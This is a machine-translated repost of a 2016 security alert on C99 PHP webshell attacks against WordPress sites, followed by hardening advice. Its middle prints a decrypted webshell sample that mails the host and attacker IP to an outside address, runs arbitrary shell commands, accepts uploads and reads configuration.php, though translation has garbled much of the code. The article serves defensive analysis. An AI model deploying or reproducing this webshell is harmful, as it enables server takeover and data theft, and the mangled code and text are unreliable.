検索

ホームページ >バックエンド開発 >PHPチュートリアル >wordpress c99 php webshel​​l攻撃が激化 Anheng Mingyu APT早期警告プラットフォーム webshel​​l監査アラーム

wordpress c99 php webshel​​l攻撃が激化 Anheng Mingyu APT早期警告プラットフォーム webshel​​l監査アラーム

WBOY
WBOYオリジナル
2016-06-20 12:31:091487ブラウズ

wordpress c99 php Webshel​​l 攻撃が激化、安恒明裕 APT 早期警告プラットフォーム Webshel​​l 監査アラーム

最近、IBM のマネージド セキュリティ サービス (MSS) チームは、次のような使用が検出されたと警告を発しました。 C99 php webshel​​l により、多数の WordPress サイトが新たな攻撃を受けており、WordPress サイト管理者はサイトの脆弱性を適時にスキャンして修復する必要があることがわかりました。

セキュリティ研究者は、IBM MSS チームによる悪意のあるイベントの長期監視と分析に基づいて、過去 2 か月間、C99 Web シェルによって引き起こされたトラフィック異常が発生していることを発見したと報告されています。 2月に監視されたイベントの数は404件でしたが、3月には588件に達しました。詳細は次のとおりです。

詳細なニュースについては、

を参照してください。 https://securityintelligence.com/got-wordpress-php- c99-webshel​​l-attachs-increasing/

安恒研究所は Google 検索を通じて c99 Webshel​​l サンプルを収集しました

復号化後、

< php

error_reporting ( 0 ) ; isset ( $_SESSION [ 'bajak' ] )) {

$visitcount = 0 ;

$web = $_SERVER [ 'HTTP_HOST' ] ;

$inj = $_SERVER [ 'REQUEST_URI' ] ; >

$body = "ada yang inject n { $web }{ $inj }" ;

$safem0de = @ ini_get ( 'safe_mode' ) ; $safem0de ) {

$security = 'SAFE_MODE = OFF ' ;

} else {

$security = 'SAFE_MODE = ON'

}

$serper = gethostbyname ( $_SERVER [ 'SERVER_ADDR' ]) ;

$injektor = gethostbyname ( $_SERVER [ 'REMOTE_ADDR' ]) ;

メール ( 'cumicd@gmail) .com' , "{ $body }" , "ハシル バジャカン http://{ $web }{ $inj } n { $security } n IP サーバー = { $serper } n IP インジェクター = { $injektor }" ) ;

$_SESSION [ 'bajak' ] = 0 ;

} else {

$_SESSION [ 'bajak' ] ++ ; >

if ( isset ( $_GET [ 'clone' ] )) {

$source = $_SERVER [ 'SCRIPT_FILENAME' ] ;

$desti = $_SERVER [ 'DOCUMENT_ROOT' ] . '/images/stories/food/footer.php' ;

名前変更 ( $source , $desti ) ;

$safem0de ( 'セーフモード' ) ;

if ( ! $safem0de ) {

$security = 'SAFE_MODE : OFF' ;

$security = 'SAFE_MODE : ON' ;

}

echo '/title><br>' </p> <p> echo '<フォントサイズ=2 color=#888888><b>' ; </p> <p> $cur_user = '(' . get_current_user ( ) ' ; 🎜> </p> echo '<font size=2 color= #888888><b>user: uid=' . $cur_user . $cur_user ' /b><br> ; <p> </p> echo '<font size=2 color=#888888><b>Uname '</b><br> ' ; <p> </p> function pwd ( ) <p> </p> $cwd = getcwd ( ) ; <p> </p> if ( $u = strrpos ( $cwd , '/ ' )) { <p> </p> if ( $u ! = strlen ( $cwd ) – 1 ) { <p> </p> return $cwd . <p> </p> } else { <p> </p> return $cwd ; <p> </p> } <p> </p> } elseif ( $u = strrpos ( $cwd , ' \ ' )) { <p> </p> if ( $u != strlen ( $cwd ) – 1 ) { <p> </p> return $cwd ; <p> </p> } else { <p> </p> return $cwd '< form method=”POST” action=””><font size=2 color=#888888><b>コマンド</b><br><input type=” text” name=”cmd”> ;<input type=”Submit” name=”command” value=”Crotz”></form>'<p> echo '<form enctype=”multipart/form-data” action method=POST><font size=2 color=#888888><b>ファイルをアップロード</b></font>< br><input type=hidden name=”submit”><input type=file name=”userfile” size=28><br><font size=2 color=#888888><b>新規name: </b></font><input type=text size=15 name=”newname” class=ta>><input type=submit class=”bt” value=”Upload Bos !!”> ;</フォーム>; </p> <p> if ( isset ( $_POST [ ‘submit’ ])) { </p> <p> $uploaddir = pwd ( ) ; </p> <p> if ( ! ( $name = $_POST [ ‘newname’ ])) { </p> <p> $name = $_FILES [ ‘userfile’ ] [ ‘name’ ] ; </p> <p> } </p> <p> move_uploaded_file ( $_FILES [ ‘userfile’ ] [ ‘tmp_name’ ] , $uploaddir . $name ) ; </p> <p> if ( move_uploaded_file ( $_FILES [ ‘userfile’ ] [ ‘tmp_name’ ] , $uploaddir . $name )) { </p> <p> echo ‘アップロード GAGAL!!!’ ; </p> <p> } else { </p> <p> echo ‘アップロードに成功しました’ 。  $uploaddir 。  $name 。  「 :P 」 ; </p> <p> } </p> <p> } </p> <p> if ( isset ( $_POST [ 'command' ])) { </p> <p> $cmd = $_POST [ 'cmd' ] ; </p> <p> 「<pre class="brush:php;toolbar:false"><font size=3 color=#000000>」 をエコーし​​ます。  シェル_exec ($cmd) 。  「</font></pre>」 ; </p> <p> } elseif ( isset ( $_GET [ ‘cmd’ ])) { </p> <p> $comd = $_GET [ ‘cmd’ ] ; </p> <p> 「<pre class="brush:php;toolbar:false"><font size=3 color=#000000>」 をエコーし​​ます。  シェル_exec ($comd) 。  「</font></pre>」 ; </p> <p> } elseif ( isset ( $_GET [ ‘rf’ ])) { </p> <p> $rf = file_get_contents ( ‘../../configuration.php’ ) ; </p> <p> echo $rf ; </p> <p> } else { </p> <p> echo ‘<pre class="brush:php;toolbar:false"><font size=3 color=#000000>’ 。  shell_exec ( ‘ls -la’ ) 。  「</font></pre>」 ; </p> <p> } </p> <p>?></p> <p> 进一步分析受害wordpress情况発行现 </p> <p> </p> <p> https://www.google.com.hk/?gws_rd=ssl #safe=strict&q=pagat+shell </p> <p> </p> <p> Webshel​​l 攻撃者は服务器上で终端コマンドまたは新しい文をステーションポイントに転送できます。より攻撃性の高い Web シェル、DDoS ゲスト端末、またはその他の恶意软件 </p> <p> </p> <p>IBM MSS 团队称、截まで 2016 年 4 月 12 日、Google 検索経由引擎简单查询,就播现其中に有32000个WordPress站点存在pagat.txt文件</p> <p>apt预警平台能够实時监测到并告警c99的webshel​​lも逃走可能警平台事前に準備された報告警機能は、最初の時点での Web シェル攻撃の実行を支援します。</p> <p> </p> <p>安全構築:</p> <p> 現在の状況に基づいて、構築ステーション ポイント管理は次のように実行できます。オペレーション、</p> <p>1、php.ini ファイル、base64 デコード機能を無効にします。php.ini ファイルで、関連する構成句「disable_functions =」を検出し、この句を「disable_functions = eval、base64_decode, gzinflate」に設定します。 ”;</p> <p>2、上流ファイルの名前を変更します。WordPress では、上流プログラムを介して上流ファイルにファイルを書き込むことを許可しています。ユーザーがまだ承認名を使用している場合、攻撃者は上流ファイルの特定のパスを容易に推すことができます。攻撃者がシェル スクリプトを含む PHP ファイルのサイズを小さくできるようにします。</p> <p>3、wordfence WordPress プラグインなど、一項使用可能なセキュリティ ファイルをインストールします。</p> <p>4、安全スキャンを実行します。建议使用开源扫描ツール,对上传文件全量扫走査,此処可使用扫描ツールModsecurity,同時にAWVS或はWordPress安全扫走器对站点进行扫走,及時公開现漏洞,并进行修复加固;</p> <p>5、ステーション・ポイントが感染したことが判明した場合、ステーション・ポイントのすべての管理鍵が更新され、ステーション・ポイントのユーザに暗号の変更を行うよう通知されます。</p></div><div class="nphpQianMsg"><div class="clear"></div></div><div class="nphpQianSheng"><span>声明:</span><div>この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。</div></div></div><div class="nphpSytBox"><span>前の記事:<a class="dBlack" title="クラスの書き方" href="https://m.php.cn/ja/faq/229475.html">クラスの書き方</a></span><span>次の記事:<a class="dBlack" title="クラスの書き方" href="https://m.php.cn/ja/faq/229478.html">クラスの書き方</a></span></div><div class="nphpSytBox2"><div class="nphpZbktTitle"><h2>関連記事</h2><em><a href="https://m.php.cn/ja/article.html" class="bBlack"><i>続きを見る</i><b></b></a></em><div class="clear"></div></div><ins class="adsbygoogle" style="display:block" data-ad-format="fluid" data-ad-layout-key="-6t+ed+2i-1n-4w" data-ad-client="ca-pub-5902227090019525" data-ad-slot="8966999616"></ins><script> (adsbygoogle = window.adsbygoogle || []).push({}); </script><ul class="nphpXgwzList"><li><b></b><a href="https://m.php.cn/ja/faq/1.html" title="cURL を使用して PHP で Get リクエストと Post リクエストを実装する方法" class="aBlack">cURL を使用して PHP で Get リクエストと Post リクエストを実装する方法</a><div class="clear"></div></li><li><b></b><a href="https://m.php.cn/ja/faq/1.html" title="cURL を使用して PHP で Get リクエストと Post リクエストを実装する方法" class="aBlack">cURL を使用して PHP で Get リクエストと Post リクエストを実装する方法</a><div class="clear"></div></li><li><b></b><a href="https://m.php.cn/ja/faq/1.html" title="cURL を使用して PHP で Get リクエストと Post リクエストを実装する方法" class="aBlack">cURL を使用して PHP で Get リクエストと Post リクエストを実装する方法</a><div class="clear"></div></li><li><b></b><a href="https://m.php.cn/ja/faq/1.html" title="cURL を使用して PHP で Get リクエストと Post リクエストを実装する方法" class="aBlack">cURL を使用して PHP で Get リクエストと Post リクエストを実装する方法</a><div class="clear"></div></li><li><b></b><a href="https://m.php.cn/ja/faq/2.html" title="正規表現内のすべての式記号 (概要)" class="aBlack">正規表現内のすべての式記号 (概要)</a><div class="clear"></div></li></ul></div></div><ins class="adsbygoogle" style="display:block" data-ad-format="autorelaxed" data-ad-client="ca-pub-5902227090019525" data-ad-slot="5027754603"></ins><script> (adsbygoogle = window.adsbygoogle || []).push({}); </script><footer><div class="footer"><div class="footertop"><img src="/static/imghwm/logo.png" alt=""><p>福祉オンライン PHP トレーニング,PHP 学習者の迅速な成長を支援します!</p></div><div class="footermid"><a href="https://m.php.cn/ja/about/us.html">私たちについて</a><a href="https://m.php.cn/ja/about/disclaimer.html">免責事項</a><a href="https://m.php.cn/ja/update/article_0_1.html">Sitemap</a></div><div class="footerbottom"><p> © php.cn All rights reserved </p></div></div></footer><script>isLogin = 0;</script><script type="text/javascript" src="/static/layui/layui.js"></script><script type="text/javascript" src="/static/js/global.js?4.9.47"></script></div><script src="https://vdse.bdstatic.com//search-video.v1.min.js"></script><link rel='stylesheet' id='_main-css' href='/static/css/viewer.min.css' type='text/css' media='all'/><script type='text/javascript' src='/static/js/viewer.min.js?1'></script><script type='text/javascript' src='/static/js/jquery-viewer.min.js'></script><script>jQuery.fn.wait = function (func, times, interval) { var _times = times || -1, //100次 _interval = interval || 20, //20毫秒每次 _self = this, _selector = this.selector, //选择器 _iIntervalID; //定时器id if( this.length ){ //如果已经获取到了,就直接执行函数 func && func.call(this); } else { _iIntervalID = setInterval(function() { if(!_times) { //是0就退出 clearInterval(_iIntervalID); } _times <= 0 || _times--; //如果是正数就 -- _self = $(_selector); //再次选择 if( _self.length ) { //判断是否取到 func && func.call(_self); clearInterval(_iIntervalID); } }, _interval); } return this; } $("table.syntaxhighlighter").wait(function() { $('table.syntaxhighlighter').append("<p class='cnblogs_code_footer'><span class='cnblogs_code_footer_icon'></span></p>"); }); $(document).on("click", ".cnblogs_code_footer",function(){ $(this).parents('table.syntaxhighlighter').css('display','inline-table');$(this).hide(); }); $('.nphpQianCont').viewer({navbar:true,title:false,toolbar:false,movable:false,viewed:function(){$('img').click(function(){$('.viewer-close').trigger('click');});}}); </script></body></html>